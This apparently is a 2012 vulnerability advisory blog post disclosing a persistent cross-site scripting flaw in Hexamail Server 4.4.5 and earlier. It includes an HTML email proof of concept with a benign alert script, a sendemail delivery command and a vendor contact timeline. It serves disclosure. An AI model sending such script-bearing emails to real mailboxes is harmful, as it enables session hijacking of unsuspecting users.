Hexamail Server <= 4.4.5 Persistent XSS Vulnerability

Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email.

<Vulnerability Description

Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and or hijack the user’s browser.

Proof of concep

By sending a malicious script to the victim email, the webmail automatically load the mail body, so the script will be automatically executed without permission from user.

[email protected]:~/# cat &#x3E; meal.txt
&#x3C;html&#x3E;
&#x3C;body&#x3E;
&#x3C;h1&#x3E;XSS pop up&#x3C;/h1&#x3E;
&#x3C;script&#x3E;alert(&#x27;Hi, what is this?&#x27;);&#x3C;/script&#x3E;
&#x3C;/body&#x3E;
&#x3C;/html&#x3E;
[email protected]:~/#

Send email to the victim:

[email protected]:~/# sendemail -f [email protected] -t [email protected] -xu [email protected] -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com

Vendor timeline

04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor respond and provides new upgrade version
04/30/2012 – Issue still affected on the latest upgrade version
04/30/2012 – Vendor said they still fixing the problem
05/10/2012 – Email sent to ask about the fix progress
06/02/2012 – No response. Sent to Secunia.

Solutio

Not available.

Default image
modpr0be

Posisi saya saat ini sebagai direktur dan pemilik PT Spentera, sebuah perusahaan yang fokus dalam bidang penetration test, incident response, intrusion analysis and forensic investigation.

Saya juga berkontribusi untuk repositori eksploit Metasploit Framework sebagai pengembang kode eksploit. Saat ini memegang sertifikasi dari Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001: 2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), dan Offensive Security Exploitation Expert (OSEE).

Jika ingin menghubungi saya dapat melalui email bisnis di tom at spentera dot id atau pribadi di me at modpr0 dot be

Articles: 64

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.